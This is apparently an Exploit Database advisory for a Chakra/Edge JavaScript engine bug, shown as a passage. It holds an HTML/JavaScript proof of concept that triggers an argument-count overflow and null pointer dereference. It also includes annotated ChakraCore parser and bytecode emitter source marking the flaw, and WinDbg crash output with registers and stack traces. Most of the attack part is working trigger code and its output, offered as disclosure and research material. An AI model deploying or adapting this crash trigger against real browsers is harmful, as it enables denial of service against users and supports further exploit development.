00007ffa`10d6b5cf : 00000156`276d4470 00007ff9`f1980680 00000000`00e80380 00000000`00e80380 : USER32!UserCallWinProcCheckWow+0x280
00007ff9`f3686d0e : 00000038`8f1fd920 00000000`00000000 00000156`26f58170 00000000`00000000 : USER32!DispatchMessageWorker+0x19f
00007ff9`f369eecb : 00000000`00000000 00000000`00000001 00000156`27229e70 00000156`26fd40f0 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee
00007ff9`ff58b4a8 : 00000000`00000000 00000156`27228f80 00000000`00000000 00000000`00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab
00007ffa`11a02774 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48
00007ffa`13770d61 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
-->
<html>
<head>
<title> POC </title>
</head>
<script>
var a=[];
a.length=0xffff-1;
a.fill('0x42424242');
var s='{';
for(var i=0; i<0x8000-1; i++){
    s+= 'a'+i+':0,'
};
s+= 'b:0';
s+= '}';
var c='function Car(){}; var car=new Car(' + a.join() + ',' + s + ')';
eval(c);
</script>
</html>
Exploit Database EDB-ID: 42467

Publication date: 2017-08-16 22:00 +00:00
Author: Huang Anwen
EDB verified: No

<!--
Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team

The issue could lead to a nullptr dereference besides the stack overflow we mentioned previously.

// ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp
Js::ArgSlot EmitArgList(
    ParseNode *pnode,
    Js::RegSlot rhsLocation,
    Js::RegSlot thisLocation,
    Js::RegSlot newTargetLocation,
    BOOL fIsEval,
    BOOL fAssignRegs,
    ByteCodeGenerator *byteCodeGenerator,
    FuncInfo *funcInfo,
    Js::ProfileId callSiteId,
    uint16 spreadArgCount = 0,
    Js::AuxArray<uint32> **spreadIndices = nullptr)
{
    // This function emits the arguments for a call.
    // ArgOut's with uses immediately following defs.

    EmitArgListStart(thisLocation, byteCodeGenerator, funcInfo, callSiteId);

    Js::RegSlot evalLocation = Js::Constants::NoRegister;

    //
    // If Emitting arguments for eval and assigning registers, get a tmpLocation for eval.
    // This would be used while generating frameDisplay in EmitArgListEnd.
    //
    if (fIsEval)
    {
        evalLocation = funcInfo->AcquireTmpRegister();
    }

    if (spreadArgCount > 0) //spreadArgCount==0 because of overflow****
    {
        const size_t extraAlloc = spreadArgCount * sizeof(uint32);
        Assert(spreadIndices != nullptr);
        *spreadIndices = AnewPlus(byteCodeGenerator->GetAllocator(), extraAlloc, Js::AuxArray<uint32>, spreadArgCount); //skip initialization of spreadIndices****
    }

    size_t argIndex = EmitArgs(pnode, fAssignRegs, byteCodeGenerator, funcInfo, callSiteId, spreadIndices == nullptr ? nullptr : *spreadIndices);

    Js::ArgSlot argumentsCount = EmitArgListEnd(pnode, rhsLocation, thisLocation, evalLocation, newTargetLocation, byteCodeGenerator, funcInfo, argIndex, callSiteId);

    if (fIsEval)
    {
        funcInfo->ReleaseTmpRegister(evalLocation);
    }

    return argumentsCount;
}

// ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp
size_t EmitArgs(
    ParseNode *pnode,
    BOOL fAssignRegs,
    ByteCodeGenerator *byteCodeGenerator,
    FuncInfo *funcInfo,
    Js::ProfileId callSiteId,
    Js::AuxArray<uint32> *spreadIndices = nullptr
    )
{
    Js::ArgSlot argIndex = 0;
    Js::ArgSlot spreadIndex = 0;

    if (pnode != nullptr)
    {
        while (pnode->nop == knopList)
        {
            // If this is a put, the arguments have already been evaluated (see EmitReference).
            // We just need to emit the ArgOut instructions.
            if (fAssignRegs)
            {
                Emit(pnode->sxBin.pnode1, byteCodeGenerator, funcInfo, false);
            }

            if (pnode->sxBin.pnode1->nop == knopEllipsis)
            {
                Assert(spreadIndices != nullptr);
                spreadIndices->elements[spreadIndex++] = argIndex + 1; // account for 'this' //nullptr dereference****
                EmitSpreadArgToListBytecodeInstr(byteCodeGenerator, funcInfo, pnode->sxBin.pnode1->location, callSiteId, argIndex);
            }
            else
            {
                byteCodeGenerator->Writer()->ArgOut<true>(++argIndex, pnode->sxBin.pnode1->location, callSiteId);
            }
            if (fAssignRegs)
            {
                funcInfo->ReleaseLoc(pnode->sxBin.pnode1);
            }
            pnode = pnode->sxBin.pnode2;
        }

        // If this is a put, the call target has already been evaluated (see EmitReference).
        if (fAssignRegs)
        {
            Emit(pnode, byteCodeGenerator, funcInfo, false);
        }

        if (pnode->nop == knopEllipsis)
        {
            Assert(spreadIndices != nullptr);
            spreadIndices->elements[spreadIndex++] = argIndex + 1; // account for 'this'
            EmitSpreadArgToListBytecodeInstr(byteCodeGenerator, funcInfo, pnode->location, callSiteId, argIndex);
        }
        else
        {
            byteCodeGenerator->Writer()->ArgOut<true>(++argIndex, pnode->location, callSiteId);
        }

        if (fAssignRegs)
        {
            funcInfo->ReleaseLoc(pnode);
        }
    }

    return argIndex;
}

Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00007ff6`56460000 00007ff6`56485000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
ModLoad: 00007ffd`4cba0000 00007ffd`4cd7b000   C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 00007ffd`4ad90000 00007ffd`4ae3e000   C:\Windows\System32\KERNEL32.DLL
ModLoad: 00007ffd`49c00000 00007ffd`49e49000   C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffd`475e0000 00007ffd`4765e000   C:\Windows\SYSTEM32\apphelp.dll
ModLoad: 00007ffd`4a1a0000 00007ffd`4a499000   C:\Windows\System32\combase.dll
ModLoad: 00007ffd`499b0000 00007ffd`49aa6000   C:\Windows\System32\ucrtbase.dll
ModLoad: 00007ffd`4b250000 00007ffd`4b375000   C:\Windows\System32\RPCRT4.dll
ModLoad: 00007ffd`49eb0000 00007ffd`49f1a000   C:\Windows\System32\bcryptPrimitives.dll
ModLoad: 00007ffd`4a100000 00007ffd`4a19d000   C:\Windows\System32\msvcrt.dll
ModLoad: 00007ffd`43c40000 00007ffd`43ca0000   C:\Windows\SYSTEM32\wincorlib.DLL
ModLoad: 00007ffd`4b380000 00007ffd`4b440000   C:\Windows\System32\OLEAUT32.dll
ModLoad: 00007ffd`49b60000 00007ffd`49bfa000   C:\Windows\System32\msvcp_win.dll
ModLoad: 00007ffd`490a0000 00007ffd`490b1000   C:\Windows\System32\kernel.appcore.dll
ModLoad: 00007ffd`2c870000 00007ffd`2cc34000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll
ModLoad: 00007ffd`492b0000 00007ffd`499a2000   C:\Windows\System32\Windows.Storage.dll
ModLoad: 00007ffd`4b4f0000 00007ffd`4b591000   C:\Windows\System32\advapi32.dll
ModLoad: 00007ffd`4b1f0000 00007ffd`4b249000   C:\Windows\System32\sechost.dll
ModLoad: 00007ffd`4cb40000 00007ffd`4cb91000   C:\Windows\System32\shlwapi.dll
ModLoad: 00007ffd`4a8e0000 00007ffd`4a907000   C:\Windows\System32\GDI32.dll
ModLoad: 00007ffd`49f20000 00007ffd`4a0a8000   C:\Windows\System32\gdi32full.dll
ModLoad: 00007ffd`4c9f0000 00007ffd`4cb3a000   C:\Windows\System32\USER32.dll
ModLoad: 00007ffd`41cb0000 00007ffd`41f36000   C:\Windows\SYSTEM32\iertutil.dll
ModLoad: 00007ffd`490c0000 00007ffd`490de000   C:\Windows\System32\win32u.dll
ModLoad: 00007ffd`4a9c0000 00007ffd`4aa6a000   C:\Windows\System32\shcore.dll
ModLoad: 00007ffd`49030000 00007ffd`4907c000   C:\Windows\System32\powrprof.dll
ModLoad: 00007ffd`49010000 00007ffd`49025000   C:\Windows\System32\profapi.dll
ModLoad: 00007ffd`48310000 00007ffd`48341000   C:\Windows\SYSTEM32\ntmarta.dll
ModLoad: 00007ffd`48f10000 00007ffd`48f39000   C:\Windows\SYSTEM32\USERENV.dll
ModLoad: 00007ffd`486a0000 00007ffd`48744000   C:\Windows\SYSTEM32\DNSAPI.dll
ModLoad: 00007ffd`4b030000 00007ffd`4b09c000   C:\Windows\System32\WS2_32.dll
ModLoad: 00007ffd`4a9b0000 00007ffd`4a9b8000   C:\Windows\System32\NSI.dll
ModLoad: 00007ffd`38c70000 00007ffd`38c96000   C:\Windows\SYSTEM32\clipc.dll
ModLoad: 00007ffd`48a60000 00007ffd`48a77000   C:\Windows\SYSTEM32\cryptsp.dll
ModLoad: 00007ffd`4b4a0000 00007ffd`4b4cd000   C:\Windows\System32\IMM32.DLL
ModLoad: 00007ffd`48660000 00007ffd`48697000   C:\Windows\SYSTEM32\IPHLPAPI.DLL
ModLoad: 00007ffd`479c0000 00007ffd`47b30000   C:\Windows\SYSTEM32\twinapi.appcore.dll
ModLoad: 00007ffd`48ee0000 00007ffd`48f05000   C:\Windows\SYSTEM32\bcrypt.dll
ModLoad: 00007ffd`48140000 00007ffd`48161000   C:\Windows\SYSTEM32\profext.dll
ModLoad: 00007ffd`38a20000 00007ffd`38a94000   C:\Windows\SYSTEM32\msiso.dll
ModLoad: 00007ffd`3e660000 00007ffd`3e682000   C:\Windows\SYSTEM32\EShims.dll
ModLoad: 00007ffd`3d710000 00007ffd`3d72b000   C:\Windows\SYSTEM32\MPR.dll
ModLoad: 00007ffd`4b0a0000 00007ffd`4b1e5000   C:\Windows\System32\ole32.dll
ModLoad: 00007ffd`47830000 00007ffd`478c5000   C:\Windows\system32\uxtheme.dll
ModLoad: 00007ffd`379c0000 00007ffd`37a61000   C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 00007ffd`2df90000 00007ffd`2f641000   C:\Windows\SYSTEM32\edgehtml.dll
ModLoad: 00007ffd`2d730000 00007ffd`2df1b000   C:\Windows\SYSTEM32\chakra.dll
ModLoad: 00007ffd`45500000 00007ffd`45639000   C:\Windows\SYSTEM32\wintypes.dll
ModLoad: 00007ffd`3e0a0000 00007ffd`3e0df000   C:\Windows\SYSTEM32\MLANG.dll
ModLoad: 00007ffd`45c20000 00007ffd`45c96000   C:\Windows\SYSTEM32\policymanager.dll
ModLoad: 00007ffd`45b90000 00007ffd`45c1f000   C:\Windows\SYSTEM32\msvcp110_win.dll
ModLoad: 00007ffd`45fb0000 00007ffd`46146000   C:\Windows\SYSTEM32\PROPSYS.dll
ModLoad: 00007ffd`39b50000 00007ffd`39c1b000   C:\Windows\System32\ieproxy.dll
ModLoad: 00007ffd`436b0000 00007ffd`437b6000   C:\Windows\System32\Windows.UI.dll
ModLoad: 00007ffd`435e0000 00007ffd`43662000   C:\Windows\SYSTEM32\TextInputFramework.dll
ModLoad: 00007ffd`46eb0000 00007ffd`46f93000   C:\Windows\SYSTEM32\CoreMessaging.dll
ModLoad: 00007ffd`44b90000 00007ffd`44e62000   C:\Windows\SYSTEM32\CoreUIComponents.dll
ModLoad: 00007ffd`45b70000 00007ffd`45b85000   C:\Windows\SYSTEM32\usermgrcli.dll
ModLoad: 00007ffd`44040000 00007ffd`44571000   C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
ModLoad: 00007ffd`4b5a0000 00007ffd`4c9d7000   C:\Windows\System32\shell32.dll
ModLoad: 00007ffd`4a0b0000 00007ffd`4a0f9000   C:\Windows\System32\cfgmgr32.dll
ModLoad: 00007ffd`46150000 00007ffd`4617a000   C:\Windows\SYSTEM32\dwmapi.dll
ModLoad: 00007ffd`39200000 00007ffd`3952e000   C:\Windows\SYSTEM32\WININET.dll
ModLoad: 00007ffd`4ac20000 00007ffd`4ad86000   C:\Windows\System32\msctf.dll
ModLoad: 00007ffd`48f40000 00007ffd`48f70000   C:\Windows\SYSTEM32\SspiCli.dll
ModLoad: 00007ffd`43860000 00007ffd`43962000   C:\Windows\SYSTEM32\mrmcorer.dll
ModLoad: 00007ffd`36760000 00007ffd`36770000   C:\Windows\SYSTEM32\tokenbinding.dll
ModLoad: 00007ffd`43ba0000 00007ffd`43c09000   C:\Windows\SYSTEM32\Bcp47Langs.dll
ModLoad: 00007ffd`396b0000 00007ffd`396cb000   C:\Windows\SYSTEM32\ondemandconnroutehelper.dll
ModLoad: 00007ffd`400d0000 00007ffd`401a7000   C:\Windows\SYSTEM32\winhttp.dll
ModLoad: 00007ffd`488c0000 00007ffd`4891c000   C:\Windows\system32\mswsock.dll
ModLoad: 00007ffd`42450000 00007ffd`4245b000   C:\Windows\SYSTEM32\WINNSI.DLL
ModLoad: 00007ffd`41940000 00007ffd`41b08000   C:\Windows\SYSTEM32\urlmon.dll
ModLoad: 00007ffd`48a80000 00007ffd`48a8b000   C:\Windows\SYSTEM32\CRYPTBASE.DLL
ModLoad: 00007ffd`36f20000 00007ffd`36f3a000   C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll
ModLoad: 00007ffd`38ae0000 00007ffd`38c6a000   C:\Windows\SYSTEM32\ieapfltr.dll
ModLoad: 00007ffd`47670000 00007ffd`4768d000   C:\Windows\System32\rmclient.dll
ModLoad: 00007ffd`34410000 00007ffd`34457000   C:\Windows\system32\dataexchange.dll
ModLoad: 00007ffd`46fa0000 00007ffd`470c2000   C:\Windows\SYSTEM32\dcomp.dll
ModLoad: 00007ffd`46620000 00007ffd`468ff000   C:\Windows\SYSTEM32\d3d11.dll
ModLoad: 00007ffd`47e80000 00007ffd`47f24000   C:\Windows\SYSTEM32\dxgi.dll
ModLoad: 00007ffd`35bb0000 00007ffd`35bc8000   C:\Windows\System32\UiaManager.dll
ModLoad: 00007ffd`37e60000 00007ffd`37ee2000   C:\Windows\system32\twinapi.dll
ModLoad: 00007ffd`2d700000 00007ffd`2d728000   C:\Windows\SYSTEM32\srpapi.dll
ModLoad: 00007ffd`490e0000 00007ffd`492a9000   C:\Windows\System32\CRYPT32.dll
ModLoad: 00007ffd`49080000 00007ffd`49091000   C:\Windows\System32\MSASN1.dll
ModLoad: 00007ffd`30870000 00007ffd`308ea000   C:\Windows\SYSTEM32\windows.ui.core.textinput.dll
ModLoad: 00007ffd`385b0000 00007ffd`3860d000   C:\Windows\SYSTEM32\ninput.dll
ModLoad: 00007ffd`46900000 00007ffd`46ea4000   C:\Windows\SYSTEM32\d2d1.dll
ModLoad: 00007ffd`40390000 00007ffd`4064f000   C:\Windows\SYSTEM32\DWrite.dll
ModLoad: 00007ffd`30470000 00007ffd`304ca000   C:\Windows\System32\Windows.Graphics.dll
ModLoad: 00007ffd`2d6f0000 00007ffd`2d6ff000   C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll
ModLoad: 00007ffd`448a0000 00007ffd`448e2000   C:\Windows\SYSTEM32\vm3dum64.dll
ModLoad: 00007ffd`44680000 00007ffd`446e7000   C:\Windows\SYSTEM32\D3D10Level9.dll
ModLoad: 00007ffd`37780000 00007ffd`377eb000   C:\Windows\System32\oleacc.dll
ModLoad: 00007ffd`2d6e0000 00007ffd`2d6f0000   C:\Windows\system32\msimtf.dll
ModLoad: 00007ffd`40030000 00007ffd`400b8000   C:\Windows\system32\directmanipulation.dll
ModLoad: 00007ffd`39af0000 00007ffd`39b04000   C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
ModLoad: 00007ffd`3f270000 00007ffd`3f2a8000   C:\Windows\System32\smartscreenps.dll
ModLoad: 00007ffd`377f0000 00007ffd`379b5000   C:\Windows\System32\uiautomationcore.dll
ModLoad: 00007ffd`40200000 00007ffd`40388000   C:\Windows\SYSTEM32\windows.globalization.dll
(18bc.14e0): Access violation - code c0000005 (!!! second chance !!!)
chakra!EmitArgs+0xddda3:
00007ffd`2da3132f 41894c8504      mov     dword ptr [r13+rax*4+4],ecx ds:00000000`00000004=????????
0:016> r
rax=0000000000000000 rbx=0000006a8f7faeb0 rcx=0000000000000001
rdx=0000019df75e3040 rsi=0000000000000002 rdi=0000006a8f7fa9c0
rip=00007ffd2da3132f rsp=0000006a8f7fb0f0 rbp=0000006a8f7fb8f0
 r8=0000000000000000  r9=0000000000000000 r10=0000000000000009
r11=0000019df75ff04d r12=0000000000000001 r13=0000000000000000
r14=0000006a8f7fb8f0 r15=0000000000000000
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010200
chakra!EmitArgs+0xddda3:
00007ffd`2da3132f 41894c8504      mov     dword ptr [r13+rax*4+4],ecx ds:00000000`00000004=????????
0:016> ub
chakra!EmitArgListEnd+0xdde2c:
00007ffd`2da3130c 0f856022f2ff    jne     chakra!EmitArgListEnd+0x92 (00007ffd`2d953572)
00007ffd`2da31312 0fb7c6          movzx   eax,si
00007ffd`2da31315 e95b22f2ff      jmp     chakra!EmitArgListEnd+0x95 (00007ffd`2d953575)
00007ffd`2da3131a 410fb7c4        movzx   eax,r12w
00007ffd`2da3131e 664403e2        add     r12w,dx
00007ffd`2da31322 0fb7cf          movzx   ecx,di
00007ffd`2da31325 03ca            add     ecx,edx
00007ffd`2da31327 488b942498000000 mov    rdx,qword ptr [rsp+98h]
0:016> u
chakra!EmitArgs+0xddda3:
00007ffd`2da3132f 41894c8504      mov     dword ptr [r13+rax*4+4],ecx
00007ffd`2da31334 488d4c2440      lea     rcx,[rsp+40h]
00007ffd`2da31339 488b4328        mov     rax,qword ptr [rbx+28h]
00007ffd`2da3133d 48894c2420      mov     qword ptr [rsp+20h],rcx
00007ffd`2da31342 488bcd          mov     rcx,rbp
00007ffd`2da31345 448b400c        mov     r8d,dword ptr [rax+0Ch]
00007ffd`2da31349 e8229c2300      call    chakra!EmitSpreadArgToListBytecodeInstr (00007ffd`2dc6af70)
00007ffd`2da3134e 0fb77c2440      movzx   edi,word ptr [rsp+40h]
0:016> kb
RetAddr : Args to Child : Call Site
00007ffd`2d953484 : 0000019d`f64e8aa0 00007ffd`00000001 0000006a`8f7fb8f0 0000019d`f75e3040 : chakra!EmitArgs+0xddda3
00007ffd`2d952850 : 0000019d`f64e8aa0 0000019d`ffffffff 0000019d`ffffffff 0000006a`ffffffff : chakra!EmitArgList+0x9c
00007ffd`2d8d3768 : 0000019d`f64e8940 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 : chakra!EmitNew+0x16c
00007ffd`2d8d2c55 : 0000019d`f64e8940 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 : chakra!Emit+0x15d8
00007ffd`2d8dd790 : 0000019d`f64e8810 0000006a`8f7fb8f0 0000019d`f75e3040 0000006a`00000001 : chakra!Emit+0xac5
00007ffd`2d8db4b9 : 0000006a`8f7fb8f0 0000019d`f64e8810 0000019d`f75e3040 0000006a`00000001 : chakra!ByteCodeGenerator::EmitTopLevelStatement+0x80
00007ffd`2d8daee5 : 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 0000019d`f75e3040 : chakra!ByteCodeGenerator::EmitGlobalBody+0x75
00007ffd`2d8da274 : 0000006a`8f7fb8f0 0000019d`f64e8030 0000019d`f75e3030 0000006a`8f7fb8f0 : chakra!ByteCodeGenerator::EmitOneFunction+0xa75
00007ffd`2d9826aa : 0000006a`8f7fb8f0 0000019d`f64e8030 00000000`00000000 0000006a`8f7fb8f0 : chakra!ByteCodeGenerator::EmitScopeList+0x164
00007ffd`2d982541 : 0000019d`f64e8030 0000019d`00003c22 0000006a`8f7fb8f0 0000006a`8f7fbb30 : chakra!ByteCodeGenerator::Generate+0x142
00007ffd`2d7a2820 : 0000019d`f64e8030 0000019d`00003c22 0000019d`f2b2d110 0000006a`8f7fbb30 : chakra!GenerateByteCode+0x8d
00007ffd`2d748201 : 0000019d`f2b2d110 0000019d`f67c0020 0000019d`00050022 0000006a`00000000 : chakra!Js::GlobalObject::DefaultEvalHelper+0x380
00007ffd`2d747fb8 : 0000019d`f6260000 00007ffd`2de79f80 0000019d`00000000 0000019d`f625c000 : chakra!Js::GlobalObject::VEval+0x231
00007ffd`2d747ecd : 0000006a`8f7fc0d0 0000019d`f625b5c0 0000019d`f2b2a150 0000006a`8f7fc090 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8
00007ffd`2d9a6be3 : 0000019d`f625b5c0 00000000`18000003 0000019d`f6270020 0000019d`f628ef00 : chakra!Js::GlobalObject::EntryEval+0x7d
00007ffd`2d896bf3 : 0000019d`f2b2a150 00000000`00000018 0000006a`8f7fc330 00000000`00000006 : chakra!amd64_CallFunction+0x93
00007ffd`2d7571ac : 0000019d`f625b5c0 00007ffd`2d747e50 0000006a`8f7fc1a0 0000006a`8f7fc330 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ffd`2d7577b4 : 0000006a`8f7fc330 0000019d`f64e009a 0000019d`f625b5c0 00007ffd`00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114
00007ffd`2d834920 : 0000006a`8f7fc330 0000019d`f64e009a 0000019d`8f7fc330 0000019d`f64e00a8 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c
00007ffd`2d82ff2c : 0000006a`8f7fc330 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250
00007ffd`2d8c80cc : 0000006a`8f7fc330 0000019d`f64c0000 0000006a`8f7fc4f0 00007ffd`4cc05401 :
chakra!Js::InterpreterStackFrame::Process+0x12c 00007ffd`2d8c7be1 : 0000019d`f6280420 0000006a`8f7fc6d0 0000019d`f6500fc2 0000006a`8f7fc6e8 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac 0000019d`f6500fc2 : 0000006a`8f7fc720 00000000`00000000 00000000`00000000 00007ffd`2d9a6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51 00007ffd`2d9a6be3 : 0000019d`f6280420 00000000`00000000 00000000`00000000 00000000`00000000 : 0x19d`f6500fc2 00007ffd`2d896bf3 : 0000019d`f2b2a150 00000000`00000000 0000019d`f2b50c00 00007ffd`2d8aa837 : chakra!amd64_CallFunction+0x93 00007ffd`2d8c1810 : 0000019d`f6280420 00007ffd`2d9a6df0 0000006a`8f7fc820 0000019d`f2b2d110 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83 00007ffd`2d8c0a37 : 0000019d`f6280420 0000006a`8f7fc910 0000019d`f2b2d110 00007ffd`4a167100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100 00007ffd`2d98907e : 0000019d`f6280420 0000006a`8f7fc970 0000019d`f2b2d110 0000019d`f2b2da00 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b 00007ffd`2d8ecd54 : 0000019d`f6280420 0000006a`8f7fc9b0 00000000`00000000 0000006a`8f7fc9c8 : chakra!ScriptSite::CallRootFunction+0x6a 00007ffd`2d881b49 : 0000019d`f2b2d000 0000019d`f6280420 0000006a`8f7fca60 00000000`00000000 : chakra!ScriptSite::Execute+0x124 00007ffd`2d882e8e : 0000019d`f2b29d00 0000006a`8f7fcf68 0000006a`8f7fcfa0 0000006a`80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5 00007ffd`2d883121 : 0000019d`f2b29d00 0000019d`f370c4c4 00000000`00000000 0000019d`f2cb4330 : chakra!ScriptEngine::ParseScriptTextCore+0x436 00007ffd`2e393c75 : 0000019d`f2b29d50 0000019d`f370c4c4 0000019d`0000008a 00000000`00000000 : chakra!ScriptEngine::ParseScriptText+0xb1 00007ffd`2e393abe : 00000000`00000000 0000006a`8f7fce39 0000019d`f2cb4260 0000019d`00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119 00007ffd`2e3935d7 : 00000000`00000000 0000019d`f2cb4260 0000019d`f2c3c1c0 0000019d`f2cb41b0 : 
edgehtml!CScriptCollection::ParseScriptText+0x202 00007ffd`2e392f07 : 0000019d`f2c50c01 0000019d`f2cac100 0000019d`00000082 00007ffd`00000000 : edgehtml!CScriptData::CommitCode+0x357 00007ffd`2e452f8d : 00000000`ffffffff 0000019d`f2c3c460 00000000`ffffffff 00000000`00000000 : edgehtml!CScriptData::Execute+0x20f 00007ffd`2e2943d4 : 00000000`00000000 0000019d`f2c8c440 00000000`00000001 00007ffd`2e44ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d 00007ffd`2e2934a1 : 0000019d`f2c50c00 00000000`00000000 0000019d`f2c50c00 0000019d`f2c2c8c0 : edgehtml!CHtmParseBase::Execute+0x204 00007ffd`2e44d23b : 00000000`00019717 0000019d`f2c20000 0000019d`f2c800b0 0000019d`f2c2c8c0 : edgehtml!CHtmPost::Exec+0x1e1 00007ffd`2e44d11f : 0000019d`f2c2c8c0 00000000`00019717 0000019d`f37e6dc0 00000000`00000000 : edgehtml!CHtmPost::Run+0x2f 00007ffd`2e44cfd3 : 0000019d`f2c20000 00000000`06363701 00000000`00000002 0000019d`f2c61740 : edgehtml!PostManExecute+0x63 00007ffd`2e44ce6d : 0000019d`f2c2c8c0 00000000`06363729 0000019d`00000000 00007ffd`41cd4779 : edgehtml!PostManResume+0xa3 00007ffd`2e45b353 : 0000019d`f2c48600 0000019d`f3734bd0 00000000`00000000 00000000`00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d 00007ffd`2e4350db : 0000019d`f2c282d0 0000019d`f2b25491 0000019d`f2b02200 0000006a`8f7fd4f0 : edgehtml!CDwnChan::OnMethodCall+0x23 00007ffd`2e2c1706 : 0000019d`f2b02728 0000019d`f2c61740 0000019d`f2b02260 0000006a`8f7fd520 : edgehtml!GWndAsyncTask::Run+0x1b 00007ffd`2e40a860 : 00000000`0e877146 0000019d`f2c617a0 0000019d`f2c800b0 00007ffd`2e369138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236 00007ffd`2e40a683 : 0000019d`f3734bd0 00000000`00000000 00000000`00000002 0000019d`f2c28170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70 00007ffd`2e2c22b3 : 0000006a`8f7fd9d0 00000000`00008002 0000019d`f2c28170 00007ffd`4ca147df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3 00007ffd`2e2c07a5 : 00000000`00008002 0000019d`f2c20000 000042e1`6a33249e 
00007ffd`2e33721d : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53 00007ffd`4c9fbc50 : 00000000`00010442 00000000`00000001 00000000`00000002 00000000`80000012 : edgehtml!GlobalWndProc+0x125 00007ffd`4c9fb5cf : 00000195`f12868c0 00007ffd`2e2c0680 00000000`00010442 00000000`00010442 : USER32!UserCallWinProcCheckWow+0x280 00007ffd`2c876d0e : 0000006a`8f7fd970 00000000`00000000 00000195`f0cd3840 00000000`00000000 : USER32!DispatchMessageWorker+0x19f 00007ffd`2c88eecb : 00000000`00000000 00000000`00000001 00000195`f0f29cd0 00000195`f0cc3960 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee 00007ffd`38a2b4a8 : 00000000`00000000 00000195`f0f28990 00000000`00000000 00000000`00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab 00007ffd`4ada2774 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48 00007ffd`4cc10d61 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21 The root cause of the nullptr derefrencing is an overflow in Parser::ParseArgList //ChakraCore-master\lib\Parser\Parse.cpp /*************************************************************************** Parse a list of arguments. 
***************************************************************************/ template<bool buildAST> ParseNodePtr Parser::ParseArgList( bool *pCallOfConstants, uint16 *pSpreadArgCount, uint16 * pCount) { ParseNodePtr pnodeArg; ParseNodePtr pnodeList = nullptr; ParseNodePtr *lastNodeRef = nullptr; // Check for an empty list Assert(m_token.tk == tkLParen); if (m_pscan->Scan() == tkRParen) { return nullptr; } *pCallOfConstants = true; *pSpreadArgCount = 0; int count=0; while (true) { // the count of arguments has to fit in an unsigned short if (count > 0xffffU) //SHOULD BE if (count >= oxffffU) Error(ERRnoMemory); // Allow spread in argument lists. IdentToken token; pnodeArg = ParseExpr<buildAST>(koplCma, nullptr, TRUE, /* fAllowEllipsis */TRUE, NULL, nullptr, nullptr, &token); ++count; //when count==0xffffU, an overflow occurs HERE!!! this->MarkEscapingRef(pnodeArg, &token); if (buildAST) { this->CheckArguments(pnodeArg); if (*pCallOfConstants && !IsConstantInFunctionCall(pnodeArg)) { *pCallOfConstants = false; } if (pnodeArg->nop == knopEllipsis) { (*pSpreadArgCount)++; } AddToNodeListEscapedUse(&pnodeList, &lastNodeRef, pnodeArg); } if (m_token.tk != tkComma) { break; } m_pscan->Scan(); if (m_token.tk == tkRParen && m_scriptContext->GetConfig()->IsES7TrailingCommaEnabled()) { break; } } if (pSpreadArgCount!=nullptr && (*pSpreadArgCount) > 0){ CHAKRATEL_LANGSTATS_INC_LANGFEATURECOUNT(SpreadFeature, m_scriptContext); } *pCount = static_cast<uint16>(count); if (buildAST) { AssertMem(lastNodeRef); AssertNodeMem(*lastNodeRef); pnodeList->ichLim = 